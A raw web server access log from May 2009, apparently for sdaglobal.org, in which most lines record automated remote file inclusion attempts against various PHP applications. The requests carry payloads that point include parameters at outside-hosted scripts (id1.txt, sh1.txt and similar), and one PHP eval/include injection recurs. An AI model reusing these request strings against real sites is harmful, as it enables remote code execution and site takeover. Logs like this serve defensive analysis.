122.117.184.187 - - [31/May/2009:13:44:13 -0400] "GET /images/chinese.gif HTTP/1.1" 304 -
122.117.184.187 - - [31/May/2009:13:44:16 -0400] "GET /images/china.gif HTTP/1.1" 304 -
222.239.76.25 - - [31/May/2009:13:44:17 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 321
222.239.76.25 - - [31/May/2009:13:44:17 -0400] "GET /log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 325
222.239.76.25 - - [31/May/2009:13:44:17 -0400] "GET /log/sdaglobal.org-access_log.3%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 354
110.45.145.50 - - [31/May/2009:13:44:19 -0400] "GET /log/sdaglobal.org-access_log.4/index.php?DOCUMENT_ROOT=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 321
110.45.145.50 - - [31/May/2009:13:44:20 -0400] "GET /index.php?DOCUMENT_ROOT=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 290
110.45.145.50 - - [31/May/2009:13:44:20 -0400] "GET /log/index.php?DOCUMENT_ROOT=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 294
62.146.68.61 - - [31/May/2009:13:44:45 -0400] "GET /log/sdaglobal.org-access_log//twindow_notice.php?shop_this_skin_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 329
62.146.68.61 - - [31/May/2009:13:44:45 -0400] "GET /log//twindow_notice.php?shop_this_skin_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 304
62.146.68.61 - - [31/May/2009:13:44:48 -0400] "GET //twindow_notice.php?shop_this_skin_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 300
62.146.68.61 - - [31/May/2009:13:44:58 -0400] "GET /log/sdaglobal.org-access_log.4//twindow_notice.php?shop_this_skin_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 331
222.239.76.25 - - [31/May/2009:13:45:00 -0400] "GET //twindow_notice.php?shop_this_skin_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 300
222.239.76.25 - - [31/May/2009:13:45:00 -0400] "GET /log//twindow_notice.php?shop_this_skin_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 304
222.239.76.25 - - [31/May/2009:13:45:00 -0400] "GET /log/sdaglobal.org-access_log//twindow_notice.php?shop_this_skin_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 329
62.146.68.61 - - [31/May/2009:13:45:01 -0400] "GET //twindow_notice.php?shop_this_skin_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 300
62.146.68.61 - - [31/May/2009:13:45:01 -0400] "GET /log//twindow_notice.php?shop_this_skin_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 304
62.146.68.61 - - [31/May/2009:13:45:01 -0400] "GET /log/sdaglobal.org-access_log//twindow_notice.php?shop_this_skin_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 329
222.239.76.25 - - [31/May/2009:13:45:05 -0400] "GET /log/sdaglobal.org-access_log.4//twindow_notice.php?shop_this_skin_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 331
62.146.68.61 - - [31/May/2009:13:45:12 -0400] "GET /log/sdaglobal.org-access_log.4//twindow_notice.php?shop_this_skin_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 331
70.219.140.53 - - [31/May/2009:13:45:14 -0400] "GET /images/english.gif HTTP/1.1" 200 2582
70.219.140.53 - - [31/May/2009:13:45:14 -0400] "GET /images/chinese.gif HTTP/1.1" 200 3578
62.146.68.61 - - [31/May/2009:13:45:24 -0400] "GET //twindow_notice.php?shop_this_skin_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 300
62.146.68.61 - - [31/May/2009:13:45:24 -0400] "GET /log//twindow_notice.php?shop_this_skin_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 304
62.146.68.61 - - [31/May/2009:13:45:24 -0400] "GET /log/sdaglobal.org-access_log//twindow_notice.php?shop_this_skin_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 329
218.234.23.44 - - [31/May/2009:13:46:20 -0400] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.triton-friendlyclub.com/2009/v5id1.txt?? HTTP/1.1" 404 346
94.23.200.54 - - [31/May/2009:13:47:11 -0400] "GET /log/sdaglobal.org-access_log///?_SERVER[DOCUMENT_ROOT]=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 312
222.239.76.25 - - [31/May/2009:13:47:36 -0400] "GET /log/sdaglobal.org-access_log.4/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 352
62.146.68.61 - - [31/May/2009:13:47:46 -0400] "GET /log/sdaglobal.org-access_log.4//twindow_notice.php?shop_this_skin_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 331
222.239.76.25 - - [31/May/2009:13:48:58 -0400] "GET //twindow_notice.php?shop_this_skin_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 300
222.239.76.25 - - [31/May/2009:13:48:58 -0400] "GET /log//twindow_notice.php?shop_this_skin_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 304
222.239.76.25 - - [31/May/2009:13:48:58 -0400] "GET /log/sdaglobal.org-access_log//twindow_notice.php?shop_this_skin_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 329
222.239.76.25 - - [31/May/2009:13:49:03 -0400] "GET /log/sdaglobal.org-access_log.4//twindow_notice.php?shop_this_skin_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 331
83.103.72.130 - - [31/May/2009:13:49:19 -0400] "GET /log/sdaglobal.org-access_log.1/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 348
110.45.145.50 - - [31/May/2009:13:49:34 -0400] "GET /log/sdaglobal.org-access_log.1/index.php?DOCUMENT_ROOT=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 321
94.23.200.54 - - [31/May/2009:13:49:47 -0400] "GET /log/sdaglobal.org-access_log///?_SERVER[DOCUMENT_ROOT]=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 312
222.239.76.25 - - [31/May/2009:13:49:58 -0400] "GET /log/sdaglobal.org-access_log.1%20%20//twindow_notice.php?shop_this_skin_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 333
222.239.76.25 - - [31/May/2009:13:49:58 -0400] "GET /log/sdaglobal.org-access_log.3%20%20//twindow_notice.php?shop_this_skin_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 333
64.182.124.1 - - [31/May/2009:13:51:35 -0400] "GET /log/sdaglobal.org-access_log//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.0" 404 311
62.146.68.61 - - [31/May/2009:13:51:37 -0400] "GET //twindow_notice.php?shop_this_skin_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 300
62.146.68.61 - - [31/May/2009:13:51:37 -0400] "GET /log//twindow_notice.php?shop_this_skin_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 304
62.146.68.61 - - [31/May/2009:13:51:37 -0400] "GET /log/sdaglobal.org-access_log//twindow_notice.php?shop_this_skin_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 329
62.146.68.61 - - [31/May/2009:13:51:48 -0400] "GET /log/sdaglobal.org-access_log.4//twindow_notice.php?shop_this_skin_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 331
94.23.200.54 - - [31/May/2009:13:53:06 -0400] "GET /log/sdaglobal.org-access_log///?_SERVER[DOCUMENT_ROOT]=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 312
94.23.200.54 - - [31/May/2009:13:53:07 -0400] "GET /log/sdaglobal.org-access_log///?_SERVER[DOCUMENT_ROOT]=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 312
83.103.72.130 - - [31/May/2009:13:54:59 -0400] "GET /log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 321
83.103.72.130 - - [31/May/2009:13:54:59 -0400] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 317
83.103.72.130 - - [31/May/2009:13:54:59 -0400] "GET /log/sdaglobal.org-access_log.1%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 350
88.183.32.67 - - [31/May/2009:13:56:47 -0400] "GET /modules/TotalCalendar/about.php?inc_dir=http://xshellbrx.by.ru/id.txt?? HTTP/1.1" 404 312
218.102.205.203 - - [31/May/2009:13:57:00 -0400] "GET /images/gd.gif HTTP/1.1" 200 4458
64.182.124.1 - - [31/May/2009:13:57:57 -0400] "GET //db.php?commonpath=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.0" 404 288
64.182.124.1 - - [31/May/2009:13:57:57 -0400] "GET /log//db.php?commonpath=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.0" 404 292
64.182.124.1 - - [31/May/2009:13:57:58 -0400] "GET /log/sdaglobal.org-access_log.4//db.php?commonpath=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.0" 404 319
64.182.124.1 - - [31/May/2009:13:58:01 -0400] "GET //db.php?commonpath=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.0" 404 288
64.182.124.1 - - [31/May/2009:13:58:02 -0400] "GET /log//db.php?commonpath=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.0" 404 292
64.182.124.1 - - [31/May/2009:13:58:02 -0400] "GET /log/sdaglobal.org-access_log.4%20%20//db.php?commonpath=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.0" 404 321
61.81.17.108 - - [31/May/2009:13:59:59 -0400] "GET /log//components/com_flyspray/startdown.php?file=http://benini.xpg.com.br/Fx29ID1.txt?? HTTP/1.1" 404 323
61.81.17.108 - - [31/May/2009:14:00:00 -0400] "GET /log/sdaglobal.org-access_log//components/com_flyspray/startdown.php?file=http://benini.xpg.com.br/Fx29ID1.txt?? HTTP/1.1" 404 348
61.81.17.108 - - [31/May/2009:14:00:01 -0400] "GET //components/com_flyspray/startdown.php?file=http://benini.xpg.com.br/Fx29ID1.txt?? HTTP/1.1" 404 319
64.182.124.1 - - [31/May/2009:14:00:12 -0400] "GET /log//db.php?commonpath=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.0" 404 292
64.182.124.1 - - [31/May/2009:14:00:12 -0400] "GET //db.php?commonpath=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.0" 404 288
64.182.124.1 - - [31/May/2009:14:00:12 -0400] "GET /log/sdaglobal.org-access_log.4%20%20//db.php?commonpath=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.0" 404 321
61.81.17.108 - - [31/May/2009:14:00:29 -0400] "GET /log/sdaglobal.org-access_log.1//components/com_flyspray/startdown.php?file=http://benini.xpg.com.br/Fx29ID1.txt?? HTTP/1.1" 404 350
83.103.72.130 - - [31/May/2009:14:00:42 -0400] "GET /log/sdaglobal.org-access_log.1/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 348
61.81.17.108 - - [31/May/2009:14:02:37 -0400] "GET /log/sdaglobal.org-access_log%20%20//components/com_flyspray/startdown.php?file=http://benini.xpg.com.br/Fx29ID1.txt?? HTTP/1.1" 404 350
83.103.72.130 - - [31/May/2009:14:03:10 -0400] "GET /log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 325
83.103.72.130 - - [31/May/2009:14:03:10 -0400] "GET /log/sdaglobal.org-access_log.4%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 354
83.103.72.130 - - [31/May/2009:14:03:11 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 321
83.103.72.130 - - [31/May/2009:14:03:41 -0400] "GET /log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 325
83.103.72.130 - - [31/May/2009:14:03:41 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 321
83.103.72.130 - - [31/May/2009:14:03:41 -0400] "GET /log/sdaglobal.org-access_log.4%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 354
112.175.141.41 - - [31/May/2009:14:08:34 -0400] "GET //include/lib.inc.php?site_path=http://tkc21.co.kr/bbs/security/online/id1.txt? HTTP/1.1" 404 301
112.175.141.41 - - [31/May/2009:14:08:34 -0400] "GET /log//include/lib.inc.php?site_path=http://tkc21.co.kr/bbs/security/online/id1.txt? HTTP/1.1" 404 305
112.175.141.41 - - [31/May/2009:14:08:42 -0400] "GET /log/sdaglobal.org-access_log.1//include/lib.inc.php?site_path=http://tkc21.co.kr/bbs/security/online/id1.txt? HTTP/1.1" 404 332
77.234.200.238 - - [31/May/2009:14:10:22 -0400] "GET /log/sdaglobal.org-access_log.4//modules/xfsection/modify.php?dir_module=http://stptcellular.net/webalizer/v4id.txt?? HTTP/1.1" 404 341
77.234.200.238 - - [31/May/2009:14:10:22 -0400] "GET //modules/xfsection/modify.php?dir_module=http://stptcellular.net/webalizer/v4id.txt?? HTTP/1.1" 404 310
77.234.200.238 - - [31/May/2009:14:10:23 -0400] "GET /log//modules/xfsection/modify.php?dir_module=http://stptcellular.net/webalizer/v4id.txt?? HTTP/1.1" 404 314
77.234.200.238 - - [31/May/2009:14:11:13 -0400] "GET //modules/xfsection/modify.php?dir_module=http://stptcellular.net/webalizer/v4id.txt?? HTTP/1.1" 404 310
221.139.104.104 - - [31/May/2009:14:13:00 -0400] "GET /log/sdaglobal.org-access_log.4/?sourcedir=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 312
221.139.104.104 - - [31/May/2009:14:13:00 -0400] "GET /log/sdaglobal.org-access_log.1/?sourcedir=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 312
221.139.104.104 - - [31/May/2009:14:13:00 -0400] "GET /log/?sourcedir=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 200 58352
91.206.183.148 - - [31/May/2009:14:13:06 -0400] "GET /log/sdaglobal.org-access_log.1//add.php?APB_rp=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 404 320
91.206.183.148 - - [31/May/2009:14:13:06 -0400] "GET //add.php?APB_rp=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 404 289
91.206.183.148 - - [31/May/2009:14:13:06 -0400] "GET /log//add.php?APB_rp=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 404 293
91.206.183.148 - - [31/May/2009:14:14:06 -0400] "GET //add.php?APB_rp=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 404 289
77.234.200.238 - - [31/May/2009:14:14:46 -0400] "GET //modules/xfsection/modify.php?dir_module=http://stptcellular.net/webalizer/v4id.txt?? HTTP/1.1" 404 306
83.103.72.130 - - [31/May/2009:14:15:39 -0400] "GET /log/sdaglobal.org-access_log.4/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 352
77.234.200.238 - - [31/May/2009:14:15:41 -0400] "GET /log/sdaglobal.org-access_log.2//modules/xfsection/modify.php?dir_module=http://stptcellular.net/webalizer/v4id.txt?? HTTP/1.1" 404 341
77.234.200.238 - - [31/May/2009:14:15:42 -0400] "GET //modules/xfsection/modify.php?dir_module=http://stptcellular.net/webalizer/v4id.txt?? HTTP/1.1" 404 310
77.234.200.238 - - [31/May/2009:14:15:42 -0400] "GET /log//modules/xfsection/modify.php?dir_module=http://stptcellular.net/webalizer/v4id.txt?? HTTP/1.1" 404 314
65.55.208.252 - - [31/May/2009:14:16:41 -0400] "GET /spain.htm HTTP/1.1" 304 -
83.103.72.130 - - [31/May/2009:14:17:16 -0400] "GET /log/sdaglobal.org-access_log.4/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 352
110.45.145.50 - - [31/May/2009:14:18:52 -0400] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 298
77.234.200.238 - - [31/May/2009:14:21:59 -0400] "GET /log/sdaglobal.org-access_log.2//modules/xfsection/modify.php?dir_module=http://stptcellular.net/webalizer/v4id.txt?? HTTP/1.1" 404 341
110.45.145.50 - - [31/May/2009:14:23:55 -0400] "GET /log/sdaglobal.org-access_log.4/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 329
110.45.145.50 - - [31/May/2009:14:23:57 -0400] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 298
110.45.145.50 - - [31/May/2009:14:23:59 -0400] "GET /log/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 302
83.245.33.38 - - [31/May/2009:14:24:25 -0400] "GET /log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 338
83.245.33.38 - - [31/May/2009:14:24:25 -0400] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 334
83.245.33.38 - - [31/May/2009:14:24:25 -0400] "GET /log/sdaglobal.org-error_log.4/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 364
212.97.132.101 - - [31/May/2009:14:27:17 -0400] "GET /errors.php?error=http://membres.lycos.fr/chpipa7/id.txt??? HTTP/1.0" 404 291
212.97.132.101 - - [31/May/2009:14:27:17 -0400] "GET /log/errors.php?error=http://membres.lycos.fr/chpipa7/id.txt??? HTTP/1.0" 404 295
212.97.132.101 - - [31/May/2009:14:27:17 -0400] "GET /log/sdaglobal.org-access_log.1/errors.php?error=http://membres.lycos.fr/chpipa7/id.txt??? HTTP/1.0" 404 322
212.97.132.101 - - [31/May/2009:14:27:22 -0400] "GET /log/sdaglobal.org-access_log.3/errors.php?error=http://membres.lycos.fr/chpipa7/id.txt??? HTTP/1.0" 404 322
212.100.229.207 - - [31/May/2009:14:30:47 -0400] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.eyepro.net//assets/images/id1.txt? HTTP/1.1" 404 325
212.100.229.207 - - [31/May/2009:14:30:47 -0400] "GET /log/sdaglobal.org-access_log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.eyepro.net//assets/images/id1.txt? HTTP/1.1" 404 356
212.100.229.207 - - [31/May/2009:14:30:47 -0400] "GET /log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.eyepro.net//assets/images/id1.txt? HTTP/1.1" 404 329
212.100.229.207 - - [31/May/2009:14:30:55 -0400] "GET /log/sdaglobal.org-access_log.4%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.eyepro.net//assets/images/id1.txt? HTTP/1.1" 404 358
212.97.132.101 - - [31/May/2009:14:30:55 -0400] "GET /log/sdaglobal.org-access_log.3%20/errors.php?error=http://membres.lycos.fr/chpipa7/id.txt??? HTTP/1.0" 404 323
212.100.229.207 - - [31/May/2009:14:30:55 -0400] "GET /log/sdaglobal.org-access_log.1%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.eyepro.net//assets/images/id1.txt? HTTP/1.1" 404 358
64.34.181.87 - - [31/May/2009:14:31:54 -0400] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://maierarchitekten.de/manager/actions/id1.txt? HTTP/1.1" 404 325
64.34.181.87 - - [31/May/2009:14:31:54 -0400] "GET /log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://maierarchitekten.de/manager/actions/id1.txt? HTTP/1.1" 404 329
64.34.181.87 - - [31/May/2009:14:31:54 -0400] "GET /log/sdaglobal.org-access_log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://maierarchitekten.de/manager/actions/id1.txt? HTTP/1.1" 404 356
64.34.181.87 - - [31/May/2009:14:32:52 -0400] "GET /log/sdaglobal.org-access_log.1%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://maierarchitekten.de/manager/actions/id1.txt? HTTP/1.1" 404 358
64.34.181.87 - - [31/May/2009:14:32:52 -0400] "GET /log/sdaglobal.org-access_log.4%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://maierarchitekten.de/manager/actions/id1.txt? HTTP/1.1" 404 358
69.94.125.100 - - [31/May/2009:14:35:51 -0400] "GET /log/lostpasswd.php?env[include_prefix]=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 299
69.94.125.100 - - [31/May/2009:14:35:51 -0400] "GET /lostpasswd.php?env[include_prefix]=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 295
69.94.125.100 - - [31/May/2009:14:35:51 -0400] "GET /log/sdaglobal.org-access_log%20%20/lostpasswd.php?env[include_prefix]=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 326
69.94.125.100 - - [31/May/2009:14:35:58 -0400] "GET /log/sdaglobal.org-access_log.1%20%20/lostpasswd.php?env[include_prefix]=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 328
69.94.125.100 - - [31/May/2009:14:35:59 -0400] "GET /lostpasswd.php?env[include_prefix]=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 295
69.94.125.100 - - [31/May/2009:14:35:59 -0400] "GET /log/lostpasswd.php?env[include_prefix]=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 299
69.94.125.100 - - [31/May/2009:14:36:06 -0400] "GET /log/sdaglobal.org-access_log%20%20/lostpasswd.php?env[include_prefix]=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 326
69.94.125.100 - - [31/May/2009:14:36:11 -0400] "GET /log/sdaglobal.org-access_log.1%20%20/lostpasswd.php?env[include_prefix]=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 328
81.223.126.82 - - [31/May/2009:14:38:26 -0400] "GET /xfsection/modify.php?dir_module=http://stptcellular.net/webalizer/v4id.txt?? HTTP/1.1" 404 301
83.245.33.38 - - [31/May/2009:14:38:49 -0400] "GET /errors.php?error=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 291
83.245.33.38 - - [31/May/2009:14:38:49 -0400] "GET /log/errors.php?error=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 295
83.245.33.38 - - [31/May/2009:14:38:49 -0400] "GET /log/sdaglobal.org-error_log.4/errors.php?error=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 321
69.94.125.100 - - [31/May/2009:14:39:49 -0400] "GET /log/sdaglobal.org-access_log/lostpasswd.php?env[include_prefix]=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 324
69.94.125.100 - - [31/May/2009:14:40:17 -0400] "GET /log/sdaglobal.org-access_log/lostpasswd.php?env[include_prefix]=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 324
69.94.125.100 - - [31/May/2009:14:40:17 -0400] "GET /log/sdaglobal.org-access_log.1/lostpasswd.php?env[include_prefix]=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 326
110.45.145.50 - - [31/May/2009:14:41:59 -0400] "GET /log/sdaglobal.org-error_log/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 326
65.55.106.161 - - [31/May/2009:14:42:22 -0400] "GET /robots.txt HTTP/1.1" 404 291
65.55.106.161 - - [31/May/2009:14:43:27 -0400] "GET /log/thai.sdaglobal.org-access_log.4 HTTP/1.1" 200 7110
83.103.72.130 - - [31/May/2009:14:46:11 -0400] "GET /log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 339
83.103.72.130 - - [31/May/2009:14:46:11 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 335
83.103.72.130 - - [31/May/2009:14:46:23 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 335
83.103.72.130 - - [31/May/2009:14:46:23 -0400] "GET /log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 339
69.94.125.100 - - [31/May/2009:14:48:39 -0400] "GET //Neos_Chronos/header.php?base_folder=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 305
69.94.125.100 - - [31/May/2009:14:48:39 -0400] "GET /log//Neos_Chronos/header.php?base_folder=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 309
69.94.125.100 - - [31/May/2009:14:48:48 -0400] "GET /log//Neos_Chronos/header.php?base_folder=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 309
69.94.125.100 - - [31/May/2009:14:48:48 -0400] "GET //Neos_Chronos/header.php?base_folder=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 305
121.165.73.157 - - [31/May/2009:14:48:51 -0400] "GET /log//modules/xfsection/modify.php?dir_module=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 314
121.165.73.157 - - [31/May/2009:14:48:51 -0400] "GET //modules/xfsection/modify.php?dir_module=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 310
121.165.73.157 - - [31/May/2009:14:48:51 -0400] "GET /log/sdaglobal.org-access_log.4%20%20//modules/xfsection/modify.php?dir_module=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 343
69.94.125.100 - - [31/May/2009:14:49:02 -0400] "GET /log/sdaglobal.org-access_log%20%20//Neos_Chronos/header.php?base_folder=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 336
69.94.125.100 - - [31/May/2009:14:49:06 -0400] "GET /log/sdaglobal.org-access_log%20%20//Neos_Chronos/header.php?base_folder=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 336
